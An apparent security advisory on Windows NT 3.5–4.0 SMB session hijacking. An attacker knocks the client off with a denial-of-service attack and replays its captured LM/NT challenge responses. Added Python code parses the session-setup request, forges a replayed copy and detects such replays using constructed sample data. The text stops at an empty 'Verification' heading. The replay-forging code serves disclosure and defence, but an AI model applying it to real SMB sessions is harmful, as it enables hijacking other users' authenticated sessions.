NT Versions Affected:
3.5, 3.51, 4.0
Problem:
NT's dialect of LanManager SMB (negotiated as "NT LM 0.12") can be intercepted during the session_setup_andx phase, i.e. while the client sends SMB_COM_SESSION_SETUP_ANDX carrying its challenge response.
The CaseInsensitivePassword and CaseSensitivePassword fields of the intercepted session_setup_andx message (in this dialect they hold the client's 24-byte LM and NT challenge responses) can be copied from the client's message and sent to the server. The responses are computed over the 8-byte challenge the server issued in its negotiate response for that connection, so they are only good against that same server connection. The legitimate client is first knocked off with a Denial-of-Service attack; by then sending the forged session_setup_andx message to the server, a session with the client's credentials can be established.
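The Python below is an added worked example and is not part of the original advisory. It parses an SMB_COM_SESSION_SETUP_ANDX request in the NT LM 0.12 dialect, lifts the CaseInsensitivePassword and CaseSensitivePassword fields, rebuilds a request carrying the copied responses under a new PID/MID (what an attacker continuing the hijacked connection would send), and shows the matching check: the same LM/NT response pair arriving from a second host. The field layout follows the published CIFS definition of the request; the header values, response bytes, account strings and host addresses are constructed for the example and correspond to no real capture.

```python
"""Parse SESSION_SETUP_ANDX (NT LM 0.12), copy the response blobs into a
forged request, and flag the replay when the pair reappears from another host."""
import struct
from dataclasses import dataclass

SMB_MAGIC = b"\xffSMB"
SMB_COM_SESSION_SETUP_ANDX = 0x73
# 32-byte SMB header: Protocol, Command, Status, Flags, Flags2, PIDHigh,
# SecurityFeatures, Reserved, TID, PIDLow, UID, MID
SMB_HDR = struct.Struct("<4sBIBHH8sHHHHH")
# 13 parameter words: AndXCommand, AndXReserved, AndXOffset, MaxBufferSize,
# MaxMpxCount, VcNumber, SessionKey, CaseInsensitivePasswordLength,
# CaseSensitivePasswordLength, Reserved, Capabilities
SSX_PARAMS = struct.Struct("<BBHHHHIHHII")
WORD_COUNT = 13
IDX_CI_LEN, IDX_CS_LEN = 7, 8      # positions of the two length words
HDR_PIDLOW, HDR_MID = 9, 11        # positions inside the unpacked header


@dataclass
class SessionSetup:
    header: bytes        # raw SMB header of the request
    params: tuple        # the 13 parameter words, unpacked
    lm_response: bytes   # CaseInsensitivePassword (ANSI slot: LM response)
    nt_response: bytes   # CaseSensitivePassword (Unicode slot: NT response)
    trailer: bytes       # AccountName, PrimaryDomain, NativeOS, NativeLanMan

    @property
    def account_name(self) -> bytes:
        return self.trailer.split(b"\x00", 1)[0]


def parse_session_setup(pkt: bytes) -> SessionSetup:
    if len(pkt) < SMB_HDR.size + 1 or pkt[:4] != SMB_MAGIC:
        raise ValueError("not an SMB message")
    hdr = SMB_HDR.unpack_from(pkt, 0)
    if hdr[1] != SMB_COM_SESSION_SETUP_ANDX:
        raise ValueError("not SESSION_SETUP_ANDX")
    off = SMB_HDR.size
    if pkt[off] != WORD_COUNT:
        raise ValueError("not the NT LM 0.12 form of the request")
    off += 1
    params = SSX_PARAMS.unpack_from(pkt, off)
    off += SSX_PARAMS.size
    (byte_count,) = struct.unpack_from("<H", pkt, off)
    off += 2
    data = pkt[off:off + byte_count]
    if len(data) != byte_count:
        raise ValueError("truncated data block")
    ci_len, cs_len = params[IDX_CI_LEN], params[IDX_CS_LEN]
    if ci_len + cs_len > byte_count:
        raise ValueError("password lengths exceed ByteCount")
    return SessionSetup(pkt[:SMB_HDR.size], params, data[:ci_len],
                        data[ci_len:ci_len + cs_len], data[ci_len + cs_len:])


def build_session_setup(header, params, lm, nt, trailer) -> bytes:
    p = list(params)
    p[IDX_CI_LEN], p[IDX_CS_LEN] = len(lm), len(nt)
    data = lm + nt + trailer
    return (header + bytes([WORD_COUNT]) + SSX_PARAMS.pack(*p)
            + struct.pack("<H", len(data)) + data)


def forge_replay(captured: bytes, pid: int, mid: int) -> bytes:
    """Copy both response blobs and the account/domain strings verbatim;
    only PIDLow and MID are ours, so the server matches the reply to us."""
    ss = parse_session_setup(captured)
    hdr = list(SMB_HDR.unpack(ss.header))
    hdr[HDR_PIDLOW], hdr[HDR_MID] = pid, mid
    return build_session_setup(SMB_HDR.pack(*hdr), ss.params,
                               ss.lm_response, ss.nt_response, ss.trailer)


def detect_replays(captures):
    """captures: iterable of (source_host, raw_smb_request). A response pair
    is tied to one server challenge, so the identical pair arriving from a
    second host is a replay indicator. Returns [(replayer, original, account)]."""
    first_seen, alerts = {}, []
    for host, pkt in captures:
        try:
            ss = parse_session_setup(pkt)
        except ValueError:
            continue
        key = (ss.lm_response, ss.nt_response)
        if key in first_seen and first_seen[key] != host:
            alerts.append((host, first_seen[key], ss.account_name))
        first_seen.setdefault(key, host)
    return alerts


# Constructed sample: 24-byte LM/NT blobs (not derived from any password or
# challenge), ASCII strings (Flags2 Unicode bit clear), arbitrary PID/MID.
SAMPLE_LM = bytes(range(0x10, 0x28))
SAMPLE_NT = bytes(range(0xA0, 0xB8))
SAMPLE_TRAILER = b"alice\x00WORKGROUP\x00Windows NT 1381\x00NT LAN MANAGER 4.0\x00"
SAMPLE_HDR = SMB_HDR.pack(SMB_MAGIC, SMB_COM_SESSION_SETUP_ANDX, 0, 0x18, 0x0003,
                          0, bytes(8), 0, 0, 0x1234, 0, 0x0001)
SAMPLE_PARAMS = (0xFF, 0, 0, 0xFFFF, 2, 1, 0, len(SAMPLE_LM), len(SAMPLE_NT), 0, 0)
CLIENT_REQUEST = build_session_setup(SAMPLE_HDR, SAMPLE_PARAMS,
                                     SAMPLE_LM, SAMPLE_NT, SAMPLE_TRAILER)

if __name__ == "__main__":
    forged = forge_replay(CLIENT_REQUEST, pid=0xBEEF, mid=0x0002)
    print(detect_replays([("10.0.0.5", CLIENT_REQUEST), ("10.0.0.99", forged)]))
```

The forged request differs from the capture only in PIDLow and MID; everything the server authenticates on is copied unchanged, which is why the detector keys on the response pair rather than on any header field.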
Verification: